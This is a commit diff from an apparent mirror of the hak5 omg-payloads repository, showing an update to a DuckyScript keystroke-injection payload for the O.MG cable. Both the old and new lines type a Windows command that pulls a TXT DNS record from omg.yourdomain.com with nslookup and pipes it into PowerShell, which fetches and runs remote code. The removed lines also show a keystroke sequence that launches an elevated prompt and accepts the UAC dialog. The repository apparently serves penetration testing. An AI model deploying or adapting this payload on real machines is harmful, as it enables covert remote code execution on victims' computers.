mirror of https://github.com/hak5/omg-payloads.git
Update payload.txt
parent
5f8a7cc4f8
commit
ab0e2be92c
|
@ -38,17 +38,11 @@ for /f "tokens=* USEBACKQ" %a in (`nslookup "-q=txt" omg.yourdomain.com 2^>nul^|
|
||||||
# In OMG code that would be:
|
# In OMG code that would be:
|
||||||
#-----------------------------------------------------------------------------------------------------------
|
#-----------------------------------------------------------------------------------------------------------
|
||||||
DUCKY_LANG US
|
DUCKY_LANG US
|
||||||
DELAY 3000
|
GUI r
|
||||||
CONTROL ESCAPE
|
|
||||||
DELAY 500
|
|
||||||
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
|
|
||||||
DELAY 500
|
|
||||||
CTRL-SHIFT ENTER
|
|
||||||
DELAY 1000
|
DELAY 1000
|
||||||
ALT Y
|
STRING CMD
|
||||||
DELAY 500
|
|
||||||
ENTER
|
ENTER
|
||||||
DELAY 500
|
DELAY 500
|
||||||
STRING cmd /c for /f "tokens=* USEBACKQ" %a in (`nslookup "-q=txt" omg.yourdomain.com 2^>nul^|find /I """"`) do @echo|set /p="%~a"|powershell -Command -
|
STRING for /f "tokens=* USEBACKQ" %a in (`nslookup "-q=txt" omg.yourdomain.com 2^>nul^|find /I """"`) do @echo|set /p="%~a"|powershell -Command -
|
||||||
ENTER
|
ENTER
|
||||||
#-----------------------------------------------------------------------------------------------------------
|
#-----------------------------------------------------------------------------------------------------------
|
||||||
|
|
Loading…
Reference in New Issue